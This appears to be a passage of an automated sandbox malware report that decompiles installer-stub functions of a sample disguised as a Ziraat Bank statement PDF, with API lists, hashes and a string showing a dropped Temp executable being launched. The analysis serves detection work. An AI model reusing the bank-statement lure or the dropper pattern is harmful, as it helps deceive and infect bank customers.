						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a268, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a268, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
						goto L27;
					} else {
						_t116 =  *0x422720 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404A0E();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x42923c - 4 + _t75 * 4);
				}
				_t76 =  *0x42a298 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404734;
				if(_t110 != 2) {
					_v8 = E004046FA;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004045C4(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004045C4(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004045F9(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a270 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x421714 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x421714 = 0;
				return 0;
			}


















                                                  0x00404795
                                                  0x004048c2
                                                  0x0040491f
                                                  0x00404923
                                                  0x004049f0
                                                  0x004049f2
                                                  0x004049f2
                                                  0x004049f8
                                                  0x004049f8
                                                  0x004049fb
                                                  0x00000000
                                                  0x00404a02
                                                  0x00404931
                                                  0x00404937
                                                  0x00404941
                                                  0x0040494c
                                                  0x0040494f
                                                  0x00404952
                                                  0x0040495d
                                                  0x00404960
                                                  0x00404967
                                                  0x00404974
                                                  0x00404985
                                                  0x0040498b
                                                  0x00404993
                                                  0x004049a1
                                                  0x004049a7
                                                  0x004049a7
                                                  0x00404967
                                                  0x004049b1
                                                  0x00000000
                                                  0x004049bc
                                                  0x004049c0
                                                  0x004049d0
                                                  0x004049d0
                                                  0x004049d6
                                                  0x004049e2
                                                  0x004049e2
                                                  0x00000000
                                                  0x004049e6
                                                  0x004049b1
                                                  0x004048cd
                                                  0x00000000
                                                  0x004048df
                                                  0x004048e4
                                                  0x004048ea
                                                  0x00000000
                                                  0x00000000
                                                  0x00404913
                                                  0x00404915
                                                  0x0040491a
                                                  0x00000000
                                                  0x0040491a
                                                  0x004048cd
                                                  0x0040479b
                                                  0x0040479e
                                                  0x004047a3
                                                  0x004047b4
                                                  0x004047b4
                                                  0x004047bc
                                                  0x004047bf
                                                  0x004047c3
                                                  0x004047c6
                                                  0x004047ca
                                                  0x004047cd
                                                  0x004047d0
                                                  0x004047d3
                                                  0x004047da
                                                  0x004047dc
                                                  0x004047dc
                                                  0x004047e6
                                                  0x004047f3
                                                  0x004047fd
                                                  0x00404802
                                                  0x00404805
                                                  0x0040480a
                                                  0x00404821
                                                  0x00404828
                                                  0x0040483b
                                                  0x0040483e
                                                  0x00404852
                                                  0x00404859
                                                  0x0040485e
                                                  0x00404863
                                                  0x00404863
                                                  0x00404871
                                                  0x0040487f
                                                  0x00404891
                                                  0x00404896
                                                  0x004048a6
                                                  0x004048a8
                                                  0x00000000

                                                  APIs
                                                  • CheckDlgButton.USER32 ref: 00404821
                                                  • GetDlgItem.USER32 ref: 00404835
                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                                                  • GetSysColor.USER32(?), ref: 00404863
                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                                                  • lstrlenW.KERNEL32(?), ref: 00404884
                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                                                  • GetDlgItem.USER32 ref: 004048FF
                                                  • SendMessageW.USER32(00000000), ref: 00404906
                                                  • GetDlgItem.USER32 ref: 00404931
                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                                                  • SetCursor.USER32(00000000), ref: 00404985
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                                                  • SetCursor.USER32(00000000), ref: 004049A1
                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                                                  Strings
                                                  • N, xrefs: 0040491F
                                                  • "C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i, xrefs: 00404960
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                  • String ID: "C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i$N
                                                  • API String ID: 3103080414-2488609871
                                                  • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                  • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                                                  • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                  • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004062AE Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004062AE(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x426de8 = 0x55004e;
				 *0x426dec = 0x4c;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x4275e8
					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
						_t53 = _t52 + 0x10;
						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00406113(_t24 + _t46, 0x4269e8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E0040620A(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00406158(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                  0x004062ae
                                                  0x004062b7
                                                  0x004062be
                                                  0x004062c8
                                                  0x004062dc
                                                  0x00406304
                                                  0x0040630b
                                                  0x0040630f
                                                  0x00406313
                                                  0x00406333
                                                  0x0040633a
                                                  0x00406344
                                                  0x00406351
                                                  0x00406356
                                                  0x0040635b
                                                  0x0040635f
                                                  0x0040636e
                                                  0x00406370
                                                  0x0040637d
                                                  0x00406381
                                                  0x0040641c
                                                  0x00000000
                                                  0x00406397
                                                  0x004063a4
                                                  0x004063c8
                                                  0x004063cc
                                                  0x004063eb
                                                  0x004063ef
                                                  0x004063ef
                                                  0x004063f1
                                                  0x004063fa
                                                  0x00406405
                                                  0x00406410
                                                  0x00406416
                                                  0x00000000
                                                  0x00406416
                                                  0x004063ce
                                                  0x004063d1
                                                  0x004063dc
                                                  0x004063d8
                                                  0x004063da
                                                  0x004063db
                                                  0x004063db
                                                  0x004063e3
                                                  0x004063e5
                                                  0x00000000
                                                  0x004063e5
                                                  0x004063af
                                                  0x004063b5
                                                  0x00000000
                                                  0x004063b5
                                                  0x00406381
                                                  0x0040635f
                                                  0x004062de
                                                  0x004062e9
                                                  0x004062f2
                                                  0x004062f6
                                                  0x00000000
                                                  0x00000000
                                                  0x004062f6
                                                  0x00406427

                                                  APIs
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                                                  • GetShortPathNameW.KERNEL32 ref: 004062F2
                                                    • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                    • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                  • GetShortPathNameW.KERNEL32 ref: 0040630F
                                                  • wsprintfA.USER32 ref: 0040632D
                                                  • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                                                  • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                                                  • GlobalFree.KERNEL32 ref: 00406416
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
                                                    • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 0040615C
                                                    • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                  • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                                  • API String ID: 2171350718-2295842750
                                                  • Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                  • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                                                  • Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                  • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 90%
                                                  			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a270;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                                                  0x0040100a
                                                  0x00401039
                                                  0x00401047
                                                  0x0040104d
                                                  0x00401051
                                                  0x0040105b
                                                  0x00401061
                                                  0x00401064
                                                  0x004010f3
                                                  0x00401089
                                                  0x0040108c
                                                  0x004010a6
                                                  0x004010bd
                                                  0x004010cc
                                                  0x004010cf
                                                  0x004010d5
                                                  0x004010d9
                                                  0x004010e4
                                                  0x004010ed
                                                  0x004010ef
                                                  0x004010ef
                                                  0x00401100
                                                  0x00401105
                                                  0x0040110d
                                                  0x00401110
                                                  0x00401112
                                                  0x00401118
                                                  0x0040111f
                                                  0x00401126
                                                  0x00401130
                                                  0x00401142
                                                  0x00401156
                                                  0x00401160
                                                  0x00401165
                                                  0x00401165
                                                  0x00401110
                                                  0x0040116e
                                                  0x00000000
                                                  0x00401178
                                                  0x00401010
                                                  0x00401013
                                                  0x00401015
                                                  0x0040101f
                                                  0x0040101f
                                                  0x00000000

                                                  APIs
                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32 ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32 ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: F
                                                  • API String ID: 941294808-1304234792
                                                  • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                  • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                                                  • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                  • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004066A5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 72%
                                                  			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x42923c - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x42a298 + _t44 * 2;
				_t45 = 0x428200;
				_t108 = 0x428200;
				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E00406668(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x428200;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x42b000;
								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
							} else {
								E004065AF(_t108,  *0x42a268);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004068EF(_t108);
							}
							goto L38;
						}
						if( *0x42a2e4 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x42a264;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E004066A5(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}





























                                                  0x004066a5
                                                  0x004066a5
                                                  0x004066a5
                                                  0x004066ab
                                                  0x004066b0
                                                  0x004066c1
                                                  0x004066c1
                                                  0x004066c9
                                                  0x004066ca
                                                  0x004066cb
                                                  0x004066cc
                                                  0x004066cf
                                                  0x004066d7
                                                  0x004066d9
                                                  0x004066ea
                                                  0x004066ed
                                                  0x004066ed
                                                  0x004066f1
                                                  0x004066f7
                                                  0x004066fa
                                                  0x004068d5
                                                  0x004068d5
                                                  0x004068e0
                                                  0x004068ec
                                                  0x004068ec
                                                  0x00000000
                                                  0x00406700
                                                  0x00406705
                                                  0x0040671a
                                                  0x0040671b
                                                  0x00406721
                                                  0x004068b3
                                                  0x004068c1
                                                  0x004068c4
                                                  0x004068c4
                                                  0x004068b5
                                                  0x004068b8
                                                  0x004068bb
                                                  0x004068bd
                                                  0x004068bd
                                                  0x004068c6
                                                  0x004068c6
                                                  0x004068cc
                                                  0x004068cf
                                                  0x00406702
                                                  0x00000000
                                                  0x00406702
                                                  0x00000000
                                                  0x004068cf
                                                  0x00406727
                                                  0x0040672a
                                                  0x00406739
                                                  0x00406740
                                                  0x0040674c
                                                  0x0040674f
                                                  0x00406752
                                                  0x00406753
                                                  0x00406758
                                                  0x0040675e
                                                  0x00406761
                                                  0x00406764
                                                  0x00406857
                                                  0x0040685c
                                                  0x0040688f
                                                  0x00406894
                                                  0x00406899
                                                  0x0040689e
                                                  0x0040689e
                                                  0x004068a3
                                                  0x004068a9
                                                  0x004068ac
                                                  0x00000000
                                                  0x004068ac
                                                  0x0040685e
                                                  0x00406861
                                                  0x00406864
                                                  0x00406879
                                                  0x00406880
                                                  0x00406866
                                                  0x0040686d
                                                  0x0040686d
                                                  0x00406888
                                                  0x0040688b
                                                  0x0040684f
                                                  0x00406850
                                                  0x00406850
                                                  0x00000000
                                                  0x0040688b
                                                  0x00406771
                                                  0x00406775
                                                  0x00406775
                                                  0x00406776
                                                  0x00406778
                                                  0x004067b5
                                                  0x004067b8
                                                  0x004067c8
                                                  0x004067cb
                                                  0x004067d3
                                                  0x004067d9
                                                  0x004067d9
                                                  0x00406834
                                                  0x00406834
                                                  0x00406836
                                                  0x00000000
                                                  0x00000000
                                                  0x004067dd
                                                  0x004067e2
                                                  0x004067e3
                                                  0x004067e5
                                                  0x004067fc
                                                  0x0040680a
                                                  0x00406810
                                                  0x00406812
                                                  0x00406830
                                                  0x00406830
                                                  0x00406830
                                                  0x00000000
                                                  0x00406830
                                                  0x00406818
                                                  0x00406821
                                                  0x00406824
                                                  0x0040682a
                                                  0x0040682e
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040682e
                                                  0x004067f6
                                                  0x004067f8
                                                  0x004067fa
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004067fa
                                                  0x00000000
                                                  0x00406834
                                                  0x004067c0
                                                  0x00000000
                                                  0x0040677a
                                                  0x00406798
                                                  0x004067a1
                                                  0x0040683e
                                                  0x00406842
                                                  0x0040684a
                                                  0x0040684a
                                                  0x00000000
                                                  0x00406842
                                                  0x004067ab
                                                  0x00406838
                                                  0x0040683c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040683c
                                                  0x00406778
                                                  0x00000000
                                                  0x00406705

                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,00000400), ref: 004067C0
                                                  • GetWindowsDirectoryW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
